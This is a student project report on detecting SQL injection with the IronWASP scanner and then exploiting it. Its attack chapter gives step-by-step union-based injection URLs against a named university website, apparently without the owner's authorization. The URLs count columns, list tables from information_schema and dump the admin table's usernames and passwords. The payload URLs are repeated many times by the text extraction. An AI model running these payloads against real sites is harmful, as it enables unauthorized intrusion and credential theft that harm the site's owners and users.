SQL Injection - Project Report
-
Upload
burhanshafaat1984 -
Category
Documents
-
view
227 -
download
0
Transcript of SQL Injection - Project Report
-
8/10/2019 SQL Injection - Project Report
1/14
-
8/10/2019 SQL Injection - Project Report
2/14
ii
PREFACE
It gives me a sense of satisfaction and pleasure at the same time while writing the
preface for the IRONWASP project report. It took several weeks of immense hard work andtiredness to complete this project.
My intention has been to produce a report which covers completely all the aspects of
this project. Therefore, I have presented the project report in a way which is accessible to
everyone.
As use of the computers in industry, commerce, education and many other fields of
life have become very common; the question of information and system security arises.
Avoiding attacks on information and network wouldnt be that easy. It requires a lot of effort
to avoid these attacks. This report discusses SQL injection vulnerability identification and
attacking.
A thorough study has been carried out of the topic. All the material has been collected
in relevance with the SQL injection vulnerability. This report is carefully designed to offer
information appropriate for SQL Injection vulnerability. All the topics are comprehensively
dealt with to give reader a firm grounding in the issue. Explanations of concepts and
principles are concise and written in clear and simple language with supportive illustrations
where required. Different diagrams are provided to make this report even more logical and
understandable for the reader.
Muhammad Burhan
-
8/10/2019 SQL Injection - Project Report
3/14
-
8/10/2019 SQL Injection - Project Report
4/14
-
8/10/2019 SQL Injection - Project Report
5/14
v
INTRODUCTION
1 IntroductionThis chapter gives a brief introduction to the project. It provides the objective,
theoretical background and project scope.
1.1 Objective
The aim of my project is to attack on a website using IRONWASP for SQL Injection
vulnerability detection and also attack on effected website using SQL Injection.
1.2 Theoretical Background
What is SQL injection?
SQL injection is a code injection technique, used to attack data-driven
applications, in which malicious SQL statements are inserted into an entry field for
execution (e.g. to dump the database contents to the attacker).
What is software vulnerability?
Software vulnerability is a security flaw, glitch, or weakness found
insoftware or in an operating system (OS) that can lead to security concerns. An
example of a software flaw is a buffer overflow.
What is IronWASP?
-
8/10/2019 SQL Injection - Project Report
6/14
vi
IronWASP (Iron Web application Advanced Security testing Platform) is one
of the world's best web vulnerability scanners.
1.3 Project Scope
1- To understand and demonstrate the working of Iron Wasp.
2- Identify vulnerability using Iron Wasp.
3- Perform attack using SQL Injection.
-
8/10/2019 SQL Injection - Project Report
7/14
-
8/10/2019 SQL Injection - Project Report
8/14
viii
Figure 1: Iron WASP Interface
2.2 Reasons for Iron WASP Selection
1- It's Free and Open source.
2- GUI based and very easy to use, no security expertise required.3- Powerful and effective scanning engine.
4- Supports recording Login sequence.
5- Reporting in both HTML and RTF formats.
6- Checks for over 25 different kinds of web vulnerabilities.
7- False Positives detection support.
8- False Negatives detection support.
9- Industry leading built-in scripting engine that supports Python and Ruby.
10- Extensible via plug-ins or modules in Python, Ruby, C# or VB.NET.
11- Comes bundled with a growing number of Modules built by researchers in the
security community.
-
8/10/2019 SQL Injection - Project Report
9/14
-
8/10/2019 SQL Injection - Project Report
10/14
x
The university offers several under graduate programs (BS, BSc, BBA, etc) as well as
graduate programs (MBA, etc). Figure 3 shows that SQL injection detected on the university
website (i.e. http://www.thelaureate.edu.pk ).
Figure 2: Target website.
Figure 3: SQL Injection Vulnerability Detected
2.3 Start Attack
Step 1: Use order by clause to find the number columns in table.
Use order by clause and increase column number 1, 2, 3 n till you get error.
For Example:
http://www.thelaureate.edu.pk/http://www.thelaureate.edu.pk/http://www.thelaureate.edu.pk/http://www.thelaureate.edu.pk/ -
8/10/2019 SQL Injection - Project Report
11/14
xi
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+2
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+3
:
:
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+7
Figure 4 show that on 7 th column we find following error as shown in figure 4 which
means that we have only 6 columns in table which is displaying data.
Figure 4: Shows error on 7 th column.
Step 2: Finding columns that are displaying on page.
To find the columns that are displaying on web page we have use a union
query f or example:
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1
Figure 5: Displayed Columns.
Step 3: Using group_concat function.
To group_concat function is used to display all table names of the given
schema. For example:
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+order+by+2http://www.thelaureate.edu.pk/contents.php?id=10+order+by+2http://www.thelaureate.edu.pk/contents.php?id=10+order+by+3http://www.thelaureate.edu.pk/contents.php?id=10+order+by+3http://www.thelaureate.edu.pk/contents.php?id=10+order+by+7http://www.thelaureate.edu.pk/contents.php?id=10+order+by+7http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+order+by+7http://www.thelaureate.edu.pk/contents.php?id=10+order+by+3http://www.thelaureate.edu.pk/contents.php?id=10+order+by+2http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1 -
8/10/2019 SQL Injection - Project Report
12/14
xii
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1
The above link displayed few tables belongs the current schema:
admin,e-news, email_group, email_management, image_gallery, images_listing, navigation,navigation_bk, news_and_events, notice_board and pages .
Figure 6: Table names.
Step 4: Find hex of the target table.
We have to enter hex code for table name in the query to execute this
successfully. The admin table is looking more interesting. Therefore I find the hex code of
admin which is 61646d696e .
Step 5: Finding column names of the table.
Group_concat will be use to display the column names. For example:
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column _name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order +by+1
Figure 7: Shows the column names of admin table.
Step 6: Retrieving data.In last step I successfully retrieved the column names (i.e. username and
password). So I use the below mentioned URL to retrieve data. Figure 8 shows the results ofadmin table.
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_name)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1 -
8/10/2019 SQL Injection - Project Report
13/14
xiii
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1
Figure 8: Shows the data of admin table.
Step 7: Beyond this is not ethical.I feel that moving ahead like delete, modify and inserting data into tables is
not ethical.
Chapter 3
CONCLUSION
3 Conclusion
As you have seen that I demonstrate the SQL injection technique. So we can insert,
update and delete any data and as well as database objects (like tables, views etc) using SQL
injection.
Therefore the desktop and web applications should be build on standards to avoid
attacks. Now-a-days there are several software products available which show the availability
of vulnerability in web and desktop applications.
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password+,5,6+from+admin+order+by+1 -
8/10/2019 SQL Injection - Project Report
14/14
xiv
APPENDIX A
WEB REFERENCES
Web References[1] http://www.thelaureate.edu.pk (Target Website)
[2] http://string-functions.com/string-hex.aspx (Convert String to Hex)
http://www.thelaureate.edu.pk/http://www.thelaureate.edu.pk/http://string-functions.com/string-hex.aspxhttp://string-functions.com/string-hex.aspxhttp://string-functions.com/string-hex.aspxhttp://www.thelaureate.edu.pk/